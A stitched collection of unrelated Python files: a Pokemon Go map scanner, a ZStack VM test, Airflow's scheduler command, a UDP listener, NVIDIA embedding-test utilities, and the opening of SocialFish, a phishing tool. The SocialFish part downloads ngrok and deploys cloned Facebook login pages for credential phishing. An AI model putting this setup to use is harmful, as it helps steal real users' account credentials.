if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
global api_last_response
if datetime.now() - api_last_response > max_idle_time:
print 'resetting connection...'
connection.login.reset()
time.sleep(wait_to_reconnect)
global api_endpoint, access_token, profile_response
api_endpoint, access_token, profile_response = connection.login(args)
api_last_response = datetime.now()
clear_stale_pokemons()
steplimit = int(args.step_limit)
global max_distance
max_distance = int(args.range)
global slack_webhook_urlpath
slack_webhook_urlpath = str(args.slack_webhook)
global pokemon_icons_prefix
if args.pokemon_icons:
pokemon_icons_prefix = args.pokemon_icons
else:
pokemon_icons_prefix = False
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId;
if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
if poke.SpawnPointId in spotted_pokemon.keys():
if spotted_pokemon[poke.SpawnPointId]['disappear_datetime'] > datetime.now():
continue
if poke.TimeTillHiddenMs < 0:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
disappear_datetime = datetime.fromtimestamp(disappear_timestamp)
distance = lonlat_to_meters(origin_lat, origin_lon, poke.Latitude, poke.Longitude)
if distance < max_distance:
time_till_disappears = disappear_datetime - datetime.now()
disappear_hours, disappear_remainder = divmod(time_till_disappears.seconds, 3600)
disappear_minutes, disappear_seconds = divmod(disappear_remainder, 60)
disappear_minutes = str(disappear_minutes)
disappear_seconds = str(disappear_seconds)
if len(disappear_seconds) == 1:
disappear_seconds = str(0) + disappear_seconds
disappear_datetime_local = disappear_datetime - timedelta(hours=4)
disappear_time = disappear_datetime_local.strftime("%H:%M:%S")
# calculate direction of Pokemon in bearing degrees
direction = bearing_degrees(origin_lat, origin_lon, poke.Latitude, poke.Longitude)
# transform in compass direction
direction = bearing_degrees_to_compass_direction(direction)
alert_text = 'I\'m just <https://pokevision.com/#/@' + str(poke.Latitude) + ',' + str(poke.Longitude) + \
'|' + "{0:.2f}".format(distance) + \
' m> ' + direction + ' until ' + disappear_time + \
' (' + disappear_minutes + ':' + disappear_seconds + ')!'
if pokemon_icons_prefix != ':pokeball:':
user_icon = pokemon_icons_prefix + pokename.lower() + ':'
else:
user_icon = ':pokeball:'
send_to_slack(alert_text, pokename, user_icon, slack_webhook_urlpath)
spotted_pokemon[poke.SpawnPointId] = {'disappear_datetime': disappear_datetime, 'pokename': pokename}
# print(r.status_code, r.reason)
global api_last_response
api_last_response = datetime.now()
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='17', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
test_crt_basic_l3_vm_with_given_num.py
|
'''
New Perf Test for creating KVM VM with basic L3 network.
The created number will depend on the environment variable: ZSTACK_VM_NUM
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
import threading
import random
session_uuid = None
session_to = None
session_mc = None
def test():
global session_uuid
global session_to
global session_mc
vm_num = os.environ.get('ZSTACK_VM_NUM')
if not vm_num:
vm_num = 0
else:
vm_num = int(vm_num)
org_num = vm_num
vm_creation_option = test_util.VmOption()
image_name = os.environ.get('imageName_s')
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_name = os.environ.get('l3PublicNetworkName')
session_uuid = acc_ops.login_as_admin()
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
l3s = test_lib.lib_get_l3s()
conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)[0].uuid
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_session_uuid(session_uuid)
vm = test_vm_header.ZstackTestVm()
random_name = random.random()
vm_name = 'multihost_basic_vm_%s' % str(random_name)
vm_creation_option.set_name(vm_name)
while vm_num > 0:
vm_creation_option.set_l3_uuids([random.choice(l3s).uuid])
vm.set_creation_option(vm_creation_option)
vm_num -= 1
thread = threading.Thread(target=vm.create)
thread.start()
while threading.active_count() > 1:
time.sleep(0.01)
cond = res_ops.gen_query_conditions('name', '=', vm_name)
vms = res_ops.query_resource_count(res_ops.VM_INSTANCE, cond, session_uuid)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if vms == org_num:
test_util.test_pass('Create %d VMs Test Success' % org_num)
else:
test_util.test_fail('Create %d VMs Test Failed. Only find %d VMs.' % (org_num, vms))
#Will be called only if exception happens in test().
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if session_uuid:
acc_ops.logout(session_uuid)
|
scheduler_command.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Scheduler command"""
import signal
from multiprocessing import Process
from typing import Optional
import daemon
from daemon.pidfile import TimeoutPIDLockFile
from airflow import settings
from airflow.jobs.scheduler_job import SchedulerJob
from airflow.utils import cli as cli_utils
from airflow.utils.cli import process_subdir, setup_locations, setup_logging, sigint_handler, sigquit_handler
def _create_scheduler_job(args):
job = SchedulerJob(
subdir=process_subdir(args.subdir),
num_runs=args.num_runs,
do_pickle=args.do_pickle,
)
return job
@cli_utils.action_logging
def scheduler(args):
"""Starts Airflow Scheduler"""
skip_serve_logs = args.skip_serve_logs
print(settings.HEADER)
if args.daemon:
pid, stdout, stderr, log_file = setup_locations(
"scheduler", args.pid, args.stdout, args.stderr, args.log_file
)
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pid, -1),
files_preserve=[handle],
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
job = _create_scheduler_job(args)
sub_proc = _serve_logs(skip_serve_logs)
job.run()
else:
job = _create_scheduler_job(args)
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
signal.signal(signal.SIGQUIT, sigquit_handler)
sub_proc = _serve_logs(skip_serve_logs)
job.run()
if sub_proc:
sub_proc.terminate()
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
from airflow.configuration import conf
from airflow.utils.serve_logs import serve_logs
if conf.get("core", "executor") in ["LocalExecutor", "SequentialExecutor"]:
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
|
pySmartListener.py
|
import socket
import sys
import select
import threading
import data_file
import time
from utils import current_milli_time
buffer_size = 1 * 1024 * 1024
def socket_to_file(port, filename):
host = "0.0.0.0"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
f = open(filename, 'wb')
try:
data, addr = s.recvfrom(buffer_size)
last_time = current_milli_time()
while data:
# print "Received Data"
if len(data) >= buffer_size:
print "Received Data of buffer size(!), increase buffer size"
data_file.add_packet(f, current_milli_time() - last_time, data)
last_time = current_milli_time()
s.settimeout(None)
data, addr = s.recvfrom(buffer_size)
except socket.timeout:
f.close()
s.close()
print "Socket Error"
streaming_port = 5000
flight_data_port = 5001
t1 = threading.Thread(target=socket_to_file, args=(streaming_port, "streaming.dat"))
t1.daemon = True
t1.start()
t2 = threading.Thread(target=socket_to_file, args=(flight_data_port, "flight_data.dat"))
t2.daemon = True
t2.start()
while t1.is_alive() or t2.is_alive():
time.sleep(0.1)
|
utils.py
|
"""
Copyright (c) 2021, NVIDIA CORPORATION.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
sys.path.append("../../") # where to find plugin
import sparse_operation_kit as sok
import tensorflow as tf
import pickle
import numpy as np
from multiprocessing import Process
local_ips = ("localhost", "127.0.0.1", "0.0.0.0")
def get_local_ip(hostname=None):
import socket
_hostname = socket.gethostname()
return socket.gethostbyname(hostname or socket.gethostname())
def is_local_ip(ip_address):
return True if ip_address in local_ips else False
def all_ips_in_local(ips):
for ip in ips:
if not is_local_ip(ip):
return False
return True
def get_local_gpu_count():
import os
text = os.popen("nvidia-smi --list-gpus").read()
text = text.strip().split("\n")
return len(text)
def get_cuda_version():
import os, re
text = os.popen("nvcc --version").read()
version = text.strip().split("\n")[-1]
version = re.search("cuda_\d+.\d+.", version).group(0)
version = re.search("\d+.\d+", version).group(0)
return version
class TestProcess(object):
def __init__(self,
func,
task_id,
arguments):
self.func = func
self.task_id = task_id
self.arguments = arguments
self.arguments.task_id = self.task_id
self.process = Process(target=self.func, args=(self.arguments,))
def start(self):
self.process.start()
def join(self):
if self.process.is_alive():
self.process.join()
def save_to_file(filename, *args):
with open(filename, 'wb') as file:
num_of_items = len(args)
if (num_of_items == 0):
raise ValueError("Nothing needed to be saved.")
pickle.dump(num_of_items, file, pickle.HIGHEST_PROTOCOL)
for item in args:
pickle.dump(item, file, pickle.HIGHEST_PROTOCOL)
print("[INFO]: dumpped items to file %s" %filename)
def restore_from_file(filename):
results = list()
with open(filename, "rb") as file:
num_of_items = pickle.load(file)
for _ in range(num_of_items):
item = pickle.load(file)
results.append(item)
print("[INFO] loadded from file %s" %filename)
return tuple(results)
def get_embedding_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return sok.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_dense_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return tf.keras.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_ones_tensor(max_vocab_size_per_gpu,
embedding_vec_size,
num,
task_id=None):
tensor = np.ones(shape=[max_vocab_size_per_gpu, embedding_vec_size], dtype=np.float32)
all_tensors = [tensor for _ in range(num)]
return all_tensors
def generate_random_samples(num_of_samples,
vocabulary_size,
slot_num,
max_nnz,
dtype=np.int64,
use_sparse_mask=True):
"""
This function is used to generate random samples used for training.
#args:
num_of_samples: integer, how many samples should be generated.
vocabulary_size: integer,
slot_num: integer,
max_nnz: integer
use_sparse_mask: boolean, whether to use sparse mask to generate sparse datas
#returns:
all_keys: dense tensor, whose shape is [num_of_samples, slot_num, max_nnz]
all_labels: dense tensor, whose shape is [num_of_samples, 1]
"""
print("[INFO]: begin to generate random samples")
from tensorflow.python.distribute.values import PerReplica
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if (vocabulary_size // slot_num <= 2 * max_nnz):
raise ValueError("Too small vocabulary_size. vocabulary_size: %d // slot_num: %d = %d <= 2 * max_nnz: %d"
%(vocabulary_size, slot_num, vocabulary_size // slot_num, 2 * max_nnz))
if use_sparse_mask:
mask = np.random.choice([-1, 1], size=(num_of_samples, slot_num, max_nnz))
filter_ = np.ones(shape=(num_of_samples, slot_num, max_nnz))
sum_ = np.sum(mask * filter_, axis=-1, keepdims=True)
index = np.where(sum_ == -max_nnz)
index = tuple(map(lambda array: array[1:] if array.ndim and array.size else array, index))
mask[index] = 1
with cp.cuda.Device(0):
all_keys = cp.zeros(shape=(num_of_samples, slot_num, max_nnz), dtype=cp.int64)
random_kernel = cp.RawKernel(r'''
__device__ size_t randInt(size_t gid, const size_t range) {
return (((gid * clock() * 214013L + 2531011L) >> 16) & 0x7fff) % range;
}
extern "C" __global__
void my_kernel(long long *nums, const size_t count,
const size_t slot_num, const size_t max_nnz,
const size_t vocab_per_slot) {
size_t gid = blockIdx.x * blockDim.x + threadIdx.x;
for (size_t i = gid; i < count; i += blockDim.x * gridDim.x) {
size_t tid_in_sample = i % (slot_num * max_nnz);
size_t slot_id = tid_in_sample / max_nnz;
size_t col_id = tid_in_sample % max_nnz;
nums[i] = vocab_per_slot * slot_id + randInt(gid, vocab_per_slot);
}
}
''', 'my_kernel')
random_kernel((num_of_samples,), (1024,),
(all_keys, num_of_samples * slot_num * max_nnz,
slot_num, max_nnz, vocabulary_size // slot_num))
all_keys = all_keys.get()
if use_sparse_mask:
all_keys[mask == -1] = -1
all_keys = np.sort(all_keys, axis=-1)[:,:,::-1]
all_labels = np.random.randint(low=0, high=2, size=(num_of_samples, 1))
print("[INFO]: generated random samples")
return all_keys, all_labels
def tf_dataset(keys, labels,
batchsize,
to_sparse_tensor=False,
repeat=None):
num_of_samples, slot_num, max_nnz = keys.shape
def _convert_to_sparse(keys, labels):
if tf.rank(keys) != 2:
keys = tf.reshape(keys, shape=[-1, max_nnz])
indices = tf.where(keys != -1)
values = tf.gather_nd(keys, indices)
return tf.sparse.SparseTensor(indices=indices,
values=values,
dense_shape=[batchsize * slot_num, max_nnz]), labels
dataset = tf.data.Dataset.from_tensor_slices((keys, labels))
dataset = dataset.repeat(repeat)
dataset = dataset.batch(batchsize)
if to_sparse_tensor:
dataset = dataset.map(lambda keys, labels:
_convert_to_sparse(keys, labels),
num_parallel_calls=1)
return dataset
def try_make_dirs(directory, chief=True):
import os
if not os.path.exists(directory) and chief:
os.makedirs(directory)
def sort_embedding_variables_by_key(keys, embedding_values, embedding_vec_size):
"""
This function is used to sort the embedding values by its relavent keys.
For example, keys: [5, 3, 6, 1], embedding values: [[0, 0, 0, 0],
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]]
After sorted, keys: [1, 3, 5, 6], embedding values: [[3, 3, 3, 3],
[1, 1, 1, 1],
[0, 0, 0, 0],
[2, 2, 2, 2]]
"""
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(embedding_values, np.ndarray):
embedding_values = np.array(embedding_values, dtype=np.float32)
sorted_indexes = np.argsort(keys)
sorted_keys = keys[sorted_indexes]
with cp.cuda.Device(0):
d_sorted_values = cp.zeros(shape=embedding_values.shape, dtype=cp.float32)
d_sorted_indexes = cp.asarray(sorted_indexes)
d_embedding_values = cp.asarray(embedding_values)
sort_values_kernel = cp.RawKernel(r'''
extern "C" __global__
void my_kernel(const size_t *sorted_indexes,
const float *values,
float *sorted_values,
const size_t values_step,
const size_t count) {
const size_t col_id = threadIdx.x;
for (size_t row_id = blockIdx.x; row_id < count; row_id += blockDim.x) {
sorted_values[row_id * values_step + col_id] =
values[sorted_indexes[row_id] * values_step + col_id];
}
}
''', 'my_kernel')
sort_values_kernel((keys.size,), (embedding_vec_size,),
(d_sorted_indexes, d_embedding_values, d_sorted_values,
embedding_vec_size, keys.size))
sorted_values = d_sorted_values.get()
return sorted_keys, sorted_values
def read_binary_file(filename,
element_type,
chunk_num_elements=65536):
import struct, os
element_type_map = {"float": ["f", 4],
"int32": ["i", 4],
"long long": ["q", 8],
"unsigned long long": ["Q", 8],
"size_t": ["N", 8]}
elem_size_in_bytes = element_type_map[element_type][1]
file_size_in_bytes = os.path.getsize(filename)
if (file_size_in_bytes % elem_size_in_bytes != 0):
raise ValueError("Invalid element size for file: %s." %filename)
chunk_size_in_bytes = chunk_num_elements * elem_size_in_bytes
if (file_size_in_bytes <= chunk_size_in_bytes):
chunk_size_in_bytes = file_size_in_bytes
chunk_count = 1
else:
chunk_count = file_size_in_bytes // chunk_size_in_bytes
results = list()
with open(filename, "rb") as file:
for _ in range(chunk_count):
buffer = file.read(chunk_size_in_bytes)
if (0 == len(buffer)):
raise RuntimeError("Error in reading file.")
elements = struct.unpack(str(chunk_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
if (file_size_in_bytes - chunk_count * chunk_size_in_bytes > 0):
buffer_size_in_bytes = file_size_in_bytes - chunk_count * chunk_size_in_bytes
buffer = file.read(buffer_size_in_bytes)
elements = struct.unpack(str(buffer_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
return results
def get_valid_tf_values(keys, values):
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(values, np.ndarray):
values = np.array(values, dtype=np.float32)
keys = tf.reshape(keys, [-1])
return tf.gather(values, keys).numpy()
if __name__ == "__main__":
all_keys, all_labels = generate_random_samples(num_of_samples=65536 * 100,
vocabulary_size=8 * 1024 * 1,
slot_num=10,
max_nnz=4,
use_sparse_mask=False)
# print("all_keys:\n", all_keys)
# print("all_labels:\n", all_labels)
dataset = tf_dataset(keys=all_keys, labels=all_labels,
batchsize=65536,
to_sparse_tensor=False,
repeat=1)
for i, (input_tensors, labels) in enumerate(dataset):
print("-"*30, "Iteration ", str(i), "-"*30)
print(input_tensors)
print(labels)
# a = [1, 2, 3]
# b = [4, 5]
# save_to_file("./test.file", a, b)
# a = restore_from_file("./test.file")
# print(a)
# local_ip = get_local_ip()
# print("local_ip: %s" %local_ip)
# keys = np.array([5, 3, 6, 1], dtype=np.int64)
# values = np.array([[0, 0, 0, 0],
# [1, 1, 1, 1],
# [2, 2, 2, 2],
# [3, 3, 3, 3]], dtype=np.float32)
# sorted_keys, sorted_values = sort_embedding_variables_by_key(keys, values, embedding_vec_size=4)
# print(sorted_keys)
# print(sorted_values)
# filename = r"./embedding_variables/test_values.file"
# keys = read_binary_file(filename, element_type="float")
# print(len(keys))
# keys = [5, 3, 6, 1]
# values = [[0, 0],
# [1, 1],
# [2, 2],
# [3, 3],
# [4, 4],
# [5, 5],
# [6, 6]]
# print(get_valid_tf_values(keys, values))
|
SocialFish.py
|
#-*- coding: utf-8 -*-
# SOCIALFISH
# by: UNDEADSEC
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print '''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END)
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print '[*] Downloading Ngrok...'
if architecture()[0] == '64bit':
filename = 'ngrok-stable-linux-amd64.zip'
else:
filename = 'ngrok-stable-linux-386.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print '''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ]
[ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ]
[ {0}Contribute on Github:{1} https://github.com/UndeadSec/SocialFish ]
[ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN)
def loadModule(module):
print '''{0}
_.-=-._ .-,
.' "-.,' /
( _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('rm -Rf Server/www/*.* && touch Server/www/cat.txt')
if option2 == '1' and social == 'Facebook':
system('cp WebPages/fb_standard/*.* Server/www/')
if option2 == '2' and social == 'Facebook':
system('cp WebPages/fb_advanced_poll/*.* Server/www/')
